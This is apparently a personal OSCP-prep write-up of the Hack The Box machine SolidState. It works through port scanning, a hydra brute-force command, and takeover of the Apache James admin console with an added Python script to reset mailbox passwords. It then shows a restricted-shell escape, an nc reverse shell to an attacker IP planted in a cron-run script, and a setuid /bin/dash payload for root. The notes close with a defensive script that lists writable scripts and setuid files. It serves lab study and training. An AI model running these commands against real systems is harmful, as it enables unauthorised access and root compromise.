OSCP Notes
HTB Write-up SolidState (Linux)
One thing I didn't do at first was scan all ports. Port 4555 is open as well.
Nmap Result:
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open pop3?
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
119/tcp open nntp?
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80:
SMTP enum:
Found [email protected] on the site, saved it to email.txt, and checked whether the server accepts it:
ismtp -h 10.129.29.189 -e email.txt
POP3 enum:
JAMES (Apache James mail server)
Running nmap -p 110,995 --script "pop3-capabilities or pop3-ntlm-info" -sV 10.129.29.189
returned nothing useful.
Brute-forcing POP3 authentication with hydra: no luck.
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
119 NNTP Enum:
4555: nmap labels it rsip, but it is the JAMES Remote Administration Tool.
nc 10.129.29.189 4555
Got in. Reset the mail users' passwords (listusers shows the accounts; setpassword <user> <newpass> resets one).
Signed in from Evolution with the new passwords and found a valuable email.
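The admin exchange above can be scripted. The following is an added example and not code from the notes: it sends a login, a password and a list of commands to the JAMES Remote Administration Tool the way the line-oriented console reads them, returns the raw reply, and parses the listusers output. The target IP is the one from the scan; the admin credentials are placeholders the notes do not state, and the listusers sample is constructed with made-up account names.

```python
import socket

# Constructed sample of what the James 2.3 admin console prints for 'listusers'
# (the account names are made up, not the box's real user list).
SAMPLE_LISTUSERS = """Existing accounts 3
user: alice
user: bob
user: mindy
"""


def parse_listusers(text):
    """Return the account names from a 'listusers' response."""
    return [line.strip()[len("user: "):]
            for line in text.splitlines()
            if line.strip().startswith("user: ")]


def admin_script(login, password, commands):
    """Build the input the admin console reads line by line: login, password,
    one command per line, then quit so the server closes the connection."""
    return "\n".join([login, password, *commands, "quit"]) + "\n"


def james_admin(host, port, login, password, commands, timeout=10):
    """Send the commands to the JAMES Remote Administration Tool and return the
    whole text reply. host/port/login/password are the caller's assumptions;
    the notes only show that the service answers on 4555."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(admin_script(login, password, commands).encode())
        chunks = []
        while True:  # read until the server closes after 'quit'
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    out = b"".join(chunks).decode(errors="replace")
    if "Login failed" in out:
        raise PermissionError("admin login rejected")
    return out


def reset_user_password(host, port, login, password, user, new_password):
    """Reset one mailbox password via 'setpassword <user> <pass>'."""
    return james_admin(host, port, login, password,
                       [f"setpassword {user} {new_password}"])


if __name__ == "__main__":
    # Assumed placeholders: ADMIN_USER / ADMIN_PASS are not stated in the notes.
    reply = james_admin("10.129.29.189", 4555, "ADMIN_USER", "ADMIN_PASS",
                        ["listusers"])
    print(parse_listusers(reply))
```

Sending all lines up front works because the console reads one line per prompt and TCP buffers the rest; the reply to a successful login contains a Welcome line, and a rejected login contains "Login failed".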
Now we are in mindy!
When I first logged in I landed in a restricted shell, so I used the trick below (ssh hands the command to the login shell with -c, and bash --noprofile starts a plain bash without sourcing the profile files that set up the restriction):
ssh [email protected] -t "bash --noprofile"
According to the ssh manual page:
-t      Force pseudo-terminal allocation. This can be used to execute arbitrary screen-based programs on a remote machine, which can be very useful, e.g. when implementing menu services. Multiple -t options force tty allocation, even if ssh has no local tty.
Now I can see other files.
Let's see if we can get a reverse shell with nc -e /bin/bash 10.10.14.131 1234 (listener on the attacker box: nc -lvnp 1234).
It worked!
Let's plug this into tmp.py.
I waited about a minute for the script to be run again, and I got a root shell!
Another way to get root:
#!/usr/bin/env python
import os
import sys

try:
    # 4755 = setuid bit (4) on top of the usual 755; once root runs this script,
    # /bin/dash becomes a root-owned setuid shell.
    os.system("chmod 4755 /bin/dash")
except Exception:
    sys.exit()

The 4 in 4755 is the setuid bit; 755 is the default permission for most binaries.
dash is another shell; unlike bash, it does not drop the effective UID when it is run setuid (bash needs -p for that).
So if we can set the SUID bit on it and execute it, we escalate privilege.
Once ls -l /bin/dash shows the permission changed to -rwsr-xr-x, type dash to run it and confirm with id that the effective UID is root.
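Two checks a practitioner runs after the two escalation paths above, as an added shell example that is not from the notes: one lists scripts under a directory that any user can write (the tmp.py situation), the other lists files carrying the setuid bit (what /bin/dash looks like after the chmod 4755 payload). The directory argument is whatever the caller passes; the cron grep assumes the system crontab files are readable.

```bash
#!/bin/bash
# Added example, not from the notes. Directory paths are the caller's choice.

# Regular files under "$1" that are world-writable and look like scripts:
# any of these run by root (cron, a service) is a privilege-escalation path.
find_world_writable_scripts() {
  find "$1" -type f -perm -o=w \( -name '*.py' -o -name '*.sh' \) 2>/dev/null | sort
}

# Regular files under "$1" with the setuid bit set. On a clean host this is the
# usual su/sudo/passwd set; a setuid shell such as /bin/dash is the backdoor.
find_setuid_files() {
  find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Root cron entries that mention a path, to tie a writable script to who runs it
# (assumption: /etc/crontab and /etc/cron.d are readable).
cron_entries_referencing() {
  grep -rs -- "$1" /etc/crontab /etc/cron.d 2>/dev/null
}

# Typical use on the box (assumed directories):
#   find_world_writable_scripts /opt
#   cron_entries_referencing tmp.py
#   find_setuid_files /bin
```

After the setuid payload has run, find_setuid_files /bin should list /bin/dash; before it, it should not.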